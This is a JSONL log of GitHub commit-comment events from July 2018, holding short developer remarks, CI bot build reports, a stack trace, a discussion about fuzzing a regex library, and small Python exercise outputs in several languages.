*** [all] Error 2\r\n```"}},"created_at":"2018-07-21T03:43:57Z"}
{"id":"7997968369","type":"CommitCommentEvent","actor":{"login":"MeatSlug"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786814,"position":3,"line":3,"path":"butts2","commit_id":"ea02dca48aca4e58cae139af7aa401e00d0d3a0e","created_at":"2018-07-21T03:44:53Z","updated_at":"2018-07-21T03:44:53Z","author_association":"NONE","body":"var1 = int\r\nvar2 = int"}},"created_at":"2018-07-21T03:44:53Z"}
{"id":"7997972360","type":"CommitCommentEvent","actor":{"login":"jasminechau2"},"repo":{"name":"vocatwk/CodeU-Nemo"},"payload":{"comment":{"id":29786824,"position":null,"line":null,"path":null,"commit_id":"ebb9df3a6279ade32411704fb157b26efaff622b","created_at":"2018-07-21T03:48:51Z","updated_at":"2018-07-21T03:48:51Z","author_association":"COLLABORATOR","body":"thank you!"}},"created_at":"2018-07-21T03:48:51Z"}
{"id":"7997972665","type":"CommitCommentEvent","actor":{"login":"Matthew-Tuazon"},"repo":{"name":"Matthew-Tuazon/BullsEye"},"payload":{"comment":{"id":29786825,"position":null,"line":null,"path":null,"commit_id":"87ff22c4286f0e5cce0d80639df4bbb435099a03","created_at":"2018-07-21T03:49:07Z","updated_at":"2018-07-21T03:49:07Z","author_association":"OWNER","body":"was able to git rebase "}},"created_at":"2018-07-21T03:49:07Z"}
{"id":"7997972792","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29786826,"position":null,"line":null,"path":null,"commit_id":"9dccea2d0821f13ef1197a3ef8e533059ee28353","created_at":"2018-07-21T03:49:15Z","updated_at":"2018-07-21T03:49:15Z","author_association":"MEMBER","body":"#48 "}},"created_at":"2018-07-21T03:49:15Z"}
{"id":"7997977122","type":"CommitCommentEvent","actor":{"login":"tarasChernysh"},"repo":{"name":"tarasChernysh/GitTestGit"},"payload":{"comment":{"id":29786831,"position":6,"line":21,"path":"GitTestGit/GitTestGit/AppDelegate.swift","commit_id":"163d6ecf1320ed633b348bf6a419840db900aa03","created_at":"2018-07-21T03:53:29Z","updated_at":"2018-07-21T03:53:29Z","author_association":"OWNER","body":"fffffffffff"}},"created_at":"2018-07-21T03:53:29Z"}
{"id":"7997977262","type":"CommitCommentEvent","actor":{"login":"tarasChernysh"},"repo":{"name":"tarasChernysh/GitTestGit"},"payload":{"comment":{"id":29786832,"position":5,"line":20,"path":"GitTestGit/GitTestGit/AppDelegate.swift","commit_id":"163d6ecf1320ed633b348bf6a419840db900aa03","created_at":"2018-07-21T03:53:38Z","updated_at":"2018-07-21T03:53:38Z","author_association":"OWNER","body":"fggggggg"}},"created_at":"2018-07-21T03:53:38Z"}
{"id":"7997977781","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29786833,"position":null,"line":null,"path":null,"commit_id":"83c87aaca85a1224a9d6b9cd3f5fa41b51e350f1","created_at":"2018-07-21T03:54:07Z","updated_at":"2018-07-21T03:54:07Z","author_association":"NONE","body":"I removing a constant a simplification in the [-3,1] sense?"}},"created_at":"2018-07-21T03:54:07Z"}
{"id":"7997978308","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"Gericop/Android-Support-Preference-V7-Fix"},"payload":{"comment":{"id":29786834,"position":null,"line":null,"path":null,"commit_id":"8f717c9a18ac8d3ee7319534c8cf36286ec54ee3","created_at":"2018-07-21T03:54:34Z","updated_at":"2018-07-21T03:54:34Z","author_association":"CONTRIBUTOR","body":"I don't think it's necessary to keep library versions in sync. What do you think?"}},"created_at":"2018-07-21T03:54:34Z"}
{"id":"7997979258","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29786836,"position":null,"line":null,"path":null,"commit_id":"1d3c9c8651ee48ee7e27fe478d369b707c1efb10","created_at":"2018-07-21T03:55:29Z","updated_at":"2018-07-21T03:55:29Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-21T03:55:29Z"}
{"id":"7997981150","type":"CommitCommentEvent","actor":{"login":"liamxis"},"repo":{"name":"liamxis/100-Python-problems"},"payload":{"comment":{"id":29786838,"position":null,"line":null,"path":null,"commit_id":"3ef4681358d5e902790c7d3b3b68b1e6ca896c79","created_at":"2018-07-21T03:57:24Z","updated_at":"2018-07-21T03:57:24Z","author_association":"OWNER","body":"请输入总利润：120000\r\n1500.0\r\n10000.0\r\n11500.0"}},"created_at":"2018-07-21T03:57:24Z"}
{"id":"7997981620","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29786839,"position":null,"line":null,"path":null,"commit_id":"69488ce2743ed385d2204dd8e64a453e20a988c4","created_at":"2018-07-21T03:57:55Z","updated_at":"2018-07-21T03:57:55Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.08 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |     1    |\n| `nodes_count`      |   172    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +6631 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0655/tlg001/__cts__.xml`                     | New      |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0655/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4483)*\n"}},"created_at":"2018-07-21T03:57:55Z"}
{"id":"7997981744","type":"CommitCommentEvent","actor":{"login":"Matthew-Tuazon"},"repo":{"name":"CelinaPeralta/celinaperalta.github.io"},"payload":{"comment":{"id":29786840,"position":null,"line":null,"path":null,"commit_id":"ea2b379b6feeacc25d44e79b92dc80ed1be13fdb","created_at":"2018-07-21T03:58:03Z","updated_at":"2018-07-21T03:58:03Z","author_association":"NONE","body":"luv commit mssgs"}},"created_at":"2018-07-21T03:58:03Z"}
{"id":"7997983435","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29786843,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-21T03:59:45Z","updated_at":"2018-07-21T03:59:45Z","author_association":"COLLABORATOR","body":"> I think this should not be done like this.\r\n\r\nI see. I agree that we shall not be testing UB.\r\n\r\n> Updated, old files are removed and there is still a crash. Please use this program to reproduce: > https://github.com/plusun/src/tree/gsoc2018/tests/fuzz/regex/libc/regexec/bug\r\n\r\nI will give it a try tomorrow (after wake up, it's morning here..).\r\n\r\nFor documentation purposes it would be nice to see error message - like ASan backtrace attached to each detected bug.\r\n\r\nPlease try to keep running the fuzzer against regex(3). Kamil F. suggested 1-2 days fuzzing with AFL, maybe a shorter period with libFuzzer, but if possible we should experiment with it with a longer execution runtime.\r\n\r\nMaybe adding some flags like `-Ofast` can boost the fuzzing process."}},"created_at":"2018-07-21T03:59:45Z"}
{"id":"7997983855","type":"CommitCommentEvent","actor":{"login":"12453romA"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29786846,"position":1,"line":171,"path":"app/src/ui/history/compare.tsx","commit_id":"8b2fb469cf88f552ae3fd2f0026e5bf25727f0fb","created_at":"2018-07-21T04:00:08Z","updated_at":"2018-07-21T04:00:08Z","author_association":"NONE","body":"vergovskij87@inbox.ru"}},"created_at":"2018-07-21T04:00:08Z"}
{"id":"7997985985","type":"CommitCommentEvent","actor":{"login":"awesomerobot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29786851,"position":null,"line":null,"path":null,"commit_id":"e513efd9376c436661e2eba51f33cd7a54f24e72","created_at":"2018-07-21T04:01:57Z","updated_at":"2018-07-21T04:01:57Z","author_association":"MEMBER","body":"🤦‍♂️ "}},"created_at":"2018-07-21T04:01:57Z"}
{"id":"7997986551","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29786853,"position":null,"line":null,"path":null,"commit_id":"089357b19c47185224f150cc09ba156889a281a9","created_at":"2018-07-21T04:02:24Z","updated_at":"2018-07-21T04:02:24Z","author_association":"OWNER","body":"Collision 2.1~3"}},"created_at":"2018-07-21T04:02:24Z"}
{"id":"7997987000","type":"CommitCommentEvent","actor":{"login":"cuzfrog"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29786854,"position":50,"line":95,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"3d2a68e02a1abc471df316f029f8e69322b572e2","created_at":"2018-07-21T04:02:51Z","updated_at":"2018-07-21T04:02:51Z","author_association":"CONTRIBUTOR","body":"This doesn't work for NIO.  You may convert an IO `File` to `Path` and use NIO to process it, but not vice versa.\r\n```\r\nCaused by: java.lang.UnsupportedOperationException\r\n        at com.sun.nio.zipfs.ZipPath.toFile(ZipPath.java:597)\r\n        at org.vafer.jdependency.Clazzpath.addClazzpathUnit(Clazzpath.java:100)\r\n```"}},"created_at":"2018-07-21T04:02:51Z"}
{"id":"7997987651","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786855,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-21T04:03:29Z","updated_at":"2018-07-21T04:03:29Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2318 of 2318 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-21T04:03:29Z"}
{"id":"7997989154","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786857,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-21T04:04:54Z","updated_at":"2018-07-21T04:04:54Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T04:04:54Z"}
{"id":"7997990223","type":"CommitCommentEvent","actor":{"login":"Gericop"},"repo":{"name":"Gericop/Android-Support-Preference-V7-Fix"},"payload":{"comment":{"id":29786860,"position":null,"line":null,"path":null,"commit_id":"8f717c9a18ac8d3ee7319534c8cf36286ec54ee3","created_at":"2018-07-21T04:05:51Z","updated_at":"2018-07-21T04:05:51Z","author_association":"OWNER","body":"At least until the stable version is out, I think it'd be better to do so just to keep everything simple. After that, it's another question as the colorpicker, datetimepicker and ringtone modules depend on the main module."}},"created_at":"2018-07-21T04:05:51Z"}
{"id":"7997993189","type":"CommitCommentEvent","actor":{"login":"OmegaPointZero"},"repo":{"name":"OmegaPointZero/nodechan"},"payload":{"comment":{"id":29786862,"position":9,"line":20,"path":"views/thread.ejs","commit_id":"5714d718662964d50f31b02869824026805d2abc","created_at":"2018-07-21T04:08:54Z","updated_at":"2018-07-21T04:08:54Z","author_association":"OWNER","body":"Was trying to figure out how to render the quoted posts with >>. Wound up doing it differently with Express on the backend and html escaping."}},"created_at":"2018-07-21T04:08:54Z"}
{"id":"7997996133","type":"CommitCommentEvent","actor":{"login":"n41270"},"repo":{"name":"n41270/SuperAdventure2"},"payload":{"comment":{"id":29786871,"position":39,"line":216,"path":"Player.cs","commit_id":"32d161727a50b3b1b5e0f2c7ec9d2981dc0ad4b8","created_at":"2018-07-21T04:11:45Z","updated_at":"2018-07-21T04:11:45Z","author_association":"OWNER","body":"not better one, but https://github.com/n41270/SuperAdventure2/commit/d4dd4c690dc496d1fcf65a6b16488dcbcbde40cb should be it."}},"created_at":"2018-07-21T04:11:45Z"}
{"id":"7997998143","type":"CommitCommentEvent","actor":{"login":"anupritaisno1"},"repo":{"name":"Cosmic-OS/platform_build"},"payload":{"comment":{"id":29786876,"position":null,"line":null,"path":null,"commit_id":"5795438fd13688f845c450be34f5dc616ca24573","created_at":"2018-07-21T04:13:48Z","updated_at":"2018-07-21T04:13:48Z","author_association":"NONE","body":"@sagarshah1729 this commit is wrong, breaks 2 step OTAs totally. Just revert it. Read the comments above the code you're modifying. This is just wrong"}},"created_at":"2018-07-21T04:13:48Z"}
{"id":"7997998186","type":"CommitCommentEvent","actor":{"login":"jlperla"},"repo":{"name":"econtoolkit/tutorials"},"payload":{"comment":{"id":29786877,"position":null,"line":null,"path":null,"commit_id":"11285c3ccbaf76a18b582c70b14f6e4a2f48fb4c","created_at":"2018-07-21T04:13:52Z","updated_at":"2018-07-21T04:13:52Z","author_association":"CONTRIBUTOR","body":"Sure, if you tested it.   If you think this works on both v0.6 and v0.7, then post on #vscode on slack to ask David about it.  The code in https://github.com/JuliaEditorSupport/julia-vscode/wiki/Known-issues-and-workarounds should then be modified."}},"created_at":"2018-07-21T04:13:52Z"}
{"id":"7997998899","type":"CommitCommentEvent","actor":{"login":"yeojin-dev"},"repo":{"name":"FC-Oasis/hackerthon-django"},"payload":{"comment":{"id":29786879,"position":null,"line":null,"path":null,"commit_id":"ce03bc8d8cbbe163bb3e058227e2bf2b844e8925","created_at":"2018-07-21T04:14:37Z","updated_at":"2018-07-21T04:14:37Z","author_association":"CONTRIBUTOR","body":"정정합니다.\r\nhttps 인증 EB 설정파일은 .elasticbeanstalk 디렉토리가 아니라 .ebextensions 디렉토리에 있어야 합니다.\r\n수정 커밋을 푸시하겠습니다."}},"created_at":"2018-07-21T04:14:37Z"}
{"id":"7997999438","type":"CommitCommentEvent","actor":{"login":"MAJARS"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29786881,"position":3,"line":30,"path":"packages/docs-theme/src/styles/_examples.scss","commit_id":"465d4a14dbc2cbf30992acdf8b3ec47d65de799d","created_at":"2018-07-21T04:15:11Z","updated_at":"2018-07-21T04:15:11Z","author_association":"NONE","body":"@@ -75,6 +75,7 @@ $dark-options-background-color: $dark-gray5;\r\n\t\t \r\n\t\t .docs-example-options {\r\n\t\t   flex: 0 0 auto;\r\n\t\t+  margin-left: $pt-grid-size;"}},"created_at":"2018-07-21T04:15:11Z"}
{"id":"7998001048","type":"CommitCommentEvent","actor":{"login":"jchaffin87"},"repo":{"name":"jchaffin87/advanced-css-and-sass"},"payload":{"comment":{"id":29786886,"position":null,"line":null,"path":null,"commit_id":"25751cd5bcb2f42679f2812e48c24cd26548f0ce","created_at":"2018-07-21T04:16:40Z","updated_at":"2018-07-21T04:16:40Z","author_association":"OWNER","body":"Forgot to add that I changed the px units to rem and the base font-size to a percentage."}},"created_at":"2018-07-21T04:16:40Z"}
{"id":"7998004526","type":"CommitCommentEvent","actor":{"login":"ry0id"},"repo":{"name":"ohlookitsAugust/RemBot"},"payload":{"comment":{"id":29786895,"position":null,"line":null,"path":null,"commit_id":"b6767b789094a9d543b0e7ca90bd7d0b89669b7f","created_at":"2018-07-21T04:20:24Z","updated_at":"2018-07-21T04:20:24Z","author_association":"COLLABORATOR","body":"no no u"}},"created_at":"2018-07-21T04:20:24Z"}
{"id":"7998005009","type":"CommitCommentEvent","actor":{"login":"HansaHalim"},"repo":{"name":"Kevcpro/discover-2019-website"},"payload":{"comment":{"id":29786896,"position":null,"line":null,"path":null,"commit_id":"79608678dc26bc7d3d676f93e8f0460a48db12a7","created_at":"2018-07-21T04:20:54Z","updated_at":"2018-07-21T04:20:54Z","author_association":"COLLABORATOR","body":"Added Footer"}},"created_at":"2018-07-21T04:20:54Z"}
{"id":"7998005181","type":"CommitCommentEvent","actor":{"login":"TheBunnyCoder"},"repo":{"name":"TheBunnyCoder/jack-torrance-solves"},"payload":{"comment":{"id":29786897,"position":null,"line":null,"path":null,"commit_id":"f441d53f82fbe1b7f4702f75efc812de05a25dca","created_at":"2018-07-21T04:21:07Z","updated_at":"2018-07-21T04:21:07Z","author_association":"OWNER","body":"it is calling won't you answer"}},"created_at":"2018-07-21T04:21:07Z"}
{"id":"7998014521","type":"CommitCommentEvent","actor":{"login":"mgonzales71"},"repo":{"name":"mgonzales71/xbmc.artwork"},"payload":{"comment":{"id":29786931,"position":null,"line":null,"path":null,"commit_id":"acd8eb53cf18c96c3078fb03fb1cd34496eaeded","created_at":"2018-07-21T04:30:47Z","updated_at":"2018-07-21T04:30:47Z","author_association":"OWNER","body":"@isama92 uploaded sever more weather icon sets.  have a LOT of local artwork that I have yet to get around to pushing to repo - will try to get around to that this weekend.  enjoy"}},"created_at":"2018-07-21T04:30:47Z"}
{"id":"7998014865","type":"CommitCommentEvent","actor":{"login":"LexiconCode"},"repo":{"name":"LexiconCode/caster"},"payload":{"comment":{"id":29786933,"position":null,"line":null,"path":null,"commit_id":"0070380c92106b00e58d2080436e98187ba1a6ac","created_at":"2018-07-21T04:31:08Z","updated_at":"2018-07-21T04:31:08Z","author_association":"OWNER","body":"Not recommended for production at this time testing in progress. "}},"created_at":"2018-07-21T04:31:08Z"}
{"id":"7998015535","type":"CommitCommentEvent","actor":{"login":"nataliarivers"},"repo":{"name":"nataliarivers/machinelearning"},"payload":{"comment":{"id":29786943,"position":null,"line":null,"path":null,"commit_id":"451df00ae6b679e263aba8dde21555c51ee1f2f0","created_at":"2018-07-21T04:31:49Z","updated_at":"2018-07-21T04:31:49Z","author_association":"OWNER","body":"Seção de Laboratório"}},"created_at":"2018-07-21T04:31:49Z"}
{"id":"7998017123","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29786947,"position":13,"line":333,"path":"sakura_core/dlg/CDlgPluginOption.cpp","commit_id":"a2a35a38f8d181a1cc5d7a82ad900a8b90966cd7","created_at":"2018-07-21T04:33:25Z","updated_at":"2018-07-21T04:33:25Z","author_association":"MEMBER","body":"GetDlgItem は win32 api のグローバルのものですよね？\r\nだとしたら :: はそのままでいいのでは？"}},"created_at":"2018-07-21T04:33:25Z"}
{"id":"7998018434","type":"CommitCommentEvent","actor":{"login":"yiwubian"},"repo":{"name":"yiwubian/blog"},"payload":{"comment":{"id":29786949,"position":null,"line":null,"path":null,"commit_id":"66daa77ffc642225029997a57bda75ca07718ee8","created_at":"2018-07-21T04:34:41Z","updated_at":"2018-07-21T04:34:41Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-21T04:34:41Z"}
{"id":"7998019488","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786951,"position":35,"line":35,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:35:41Z","updated_at":"2018-07-21T04:35:41Z","author_association":"COLLABORATOR","body":"this should be 1e-10 to match the stuff before"}},"created_at":"2018-07-21T04:35:41Z"}
{"id":"7998019943","type":"CommitCommentEvent","actor":{"login":"intika"},"repo":{"name":"intika/ultimategmailfeed"},"payload":{"comment":{"id":29786953,"position":null,"line":null,"path":null,"commit_id":"29e93f42e39dd22843697834e6dc5d8349a5e004","created_at":"2018-07-21T04:36:09Z","updated_at":"2018-07-21T04:36:09Z","author_association":"OWNER","body":"@Shatur95 feel free to re update the translation i had to rebase because i forget to add those file on my last push "}},"created_at":"2018-07-21T04:36:09Z"}
{"id":"7998020422","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786954,"position":null,"line":null,"path":null,"commit_id":"b610295505df1ba95ce79cfc5cd43a92730b6b5a","created_at":"2018-07-21T04:36:34Z","updated_at":"2018-07-21T04:36:34Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2945 of 2945 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-21T04:36:34Z"}
{"id":"7998021444","type":"CommitCommentEvent","actor":{"login":"beru"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29786956,"position":13,"line":333,"path":"sakura_core/dlg/CDlgPluginOption.cpp","commit_id":"a2a35a38f8d181a1cc5d7a82ad900a8b90966cd7","created_at":"2018-07-21T04:37:41Z","updated_at":"2018-07-21T04:37:41Z","author_association":"CONTRIBUTOR","body":"いったん前のコミットの変更は revert した後にコメントして頂いた内容で置換しました。\r\n\r\n:: は付けておいても良いと思いますが、このPRの変更前の記述に戻したのでこうなりました。"}},"created_at":"2018-07-21T04:37:41Z"}
{"id":"7998023880","type":"CommitCommentEvent","actor":{"login":"praksahb"},"repo":{"name":"praksahb/snake-game"},"payload":{"comment":{"id":29786961,"position":null,"line":null,"path":null,"commit_id":"11483f5e151303625c3bdf9a6ca3355aa3b4ee6d","created_at":"2018-07-21T04:40:14Z","updated_at":"2018-07-21T04:40:14Z","author_association":"OWNER","body":"changed codes in snake2.js tried different method as found"}},"created_at":"2018-07-21T04:40:14Z"}
{"id":"7998024062","type":"CommitCommentEvent","actor":{"login":"rajeshkumar010"},"repo":{"name":"rajeshkumar010/rajesh"},"payload":{"comment":{"id":29786962,"position":null,"line":null,"path":null,"commit_id":"f9b6d562f5f341f5679e6d7c0057da46bad1aea3","created_at":"2018-07-21T04:40:26Z","updated_at":"2018-07-21T04:40:26Z","author_association":"OWNER","body":"how to find vowel"}},"created_at":"2018-07-21T04:40:26Z"}
{"id":"7998024646","type":"CommitCommentEvent","actor":{"login":"venkattech3889"},"repo":{"name":"Sea-feliz/Jenkins_docker"},"payload":{"comment":{"id":29786963,"position":null,"line":null,"path":null,"commit_id":"0a4453b23647d04291c3397b01c5a4e966a5d7a5","created_at":"2018-07-21T04:41:00Z","updated_at":"2018-07-21T04:41:00Z","author_association":"CONTRIBUTOR","body":"okay"}},"created_at":"2018-07-21T04:41:00Z"}
{"id":"7998024986","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29786964,"position":null,"line":null,"path":null,"commit_id":"d5d67d526d4de436d85f813e08abbd01ce44f58d","created_at":"2018-07-21T04:41:19Z","updated_at":"2018-07-21T04:41:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-896](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-896).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-896-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-21T04:41:19Z"}
{"id":"7998026583","type":"CommitCommentEvent","actor":{"login":"liamxis"},"repo":{"name":"liamxis/100-Python-problems"},"payload":{"comment":{"id":29786968,"position":null,"line":null,"path":null,"commit_id":"dbd2d3e7e6e2681b469ab599577eebf9787411b7","created_at":"2018-07-21T04:42:59Z","updated_at":"2018-07-21T04:42:59Z","author_association":"OWNER","body":"-99\r\n21\r\n261\r\n1581\r\n"}},"created_at":"2018-07-21T04:42:59Z"}
{"id":"7998026969","type":"CommitCommentEvent","actor":{"login":"liamxis"},"repo":{"name":"liamxis/100-Python-problems"},"payload":{"comment":{"id":29786969,"position":null,"line":null,"path":null,"commit_id":"dbd2d3e7e6e2681b469ab599577eebf9787411b7","created_at":"2018-07-21T04:43:24Z","updated_at":"2018-07-21T04:43:24Z","author_association":"OWNER","body":"假设该数为 x。\r\n\r\n1、则：x + 100 = n2, x + 100 + 168 = m2\r\n\r\n2、计算等式：m2 - n2 = (m + n)(m - n) = 168\r\n\r\n3、设置： m + n = i，m - n = j，i * j =168，i 和 j 至少一个是偶数\r\n\r\n4、可得： m = (i + j) / 2， n = (i - j) / 2，i 和 j 要么都是偶数，要么都是奇数。\r\n\r\n5、从 3 和 4 推导可知道，i 与 j 均是大于等于 2 的偶数。\r\n\r\n6、由于 i * j = 168， j>=2，则 1 < i < 168 / 2 + 1。\r\n\r\n7、接下来将 i 的所有数字循环计算即可。\r\n\r\n程序源代码：\r\n\r\n实例(Python 2.0+)\r\n#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n \r\nfor i in range(1,85):\r\n    if 168 % i == 0:\r\n        j = 168 / i;\r\n        if  i > j and (i + j) % 2 == 0 and (i - j) % 2 == 0 :\r\n            m = (i + j) / 2\r\n            n = (i - j) / 2\r\n            x = n * n - 100\r\n            print(x)\r\n以上实例输出结果为：\r\n\r\n-99\r\n21\r\n261\r\n1581"}},"created_at":"2018-07-21T04:43:24Z"}
{"id":"7998030774","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786978,"position":175,"line":175,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:46:09Z","updated_at":"2018-07-21T04:46:09Z","author_association":"COLLABORATOR","body":"but if we do keep these, they need to be rescheduled, like `s1` below"}},"created_at":"2018-07-21T04:46:09Z"}
{"id":"7998031996","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29786981,"position":null,"line":null,"path":null,"commit_id":"ccadd2468f3535b6a3a87deda735cdc62a0f6c7a","created_at":"2018-07-21T04:47:22Z","updated_at":"2018-07-21T04:47:22Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.08 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |     1    |\n| `nodes_count`      |   172    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +6631 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0655/tlg001/__cts__.xml`                     | New      |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0655/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4485)*\n"}},"created_at":"2018-07-21T04:47:22Z"}
{"id":"7998033249","type":"CommitCommentEvent","actor":{"login":"jaszb"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29786982,"position":null,"line":null,"path":null,"commit_id":"aeb326640a99f6c68b175e9aff3daf0818e9e916","created_at":"2018-07-21T04:48:41Z","updated_at":"2018-07-21T04:48:41Z","author_association":"NONE","body":"also noticed the change to the select before the where \r\n`| select rawattributes | select -ExpandProperty * | `\r\n\r\nwithout this extra select you cannot read the values as far as i can tell.\r\n"}},"created_at":"2018-07-21T04:48:41Z"}
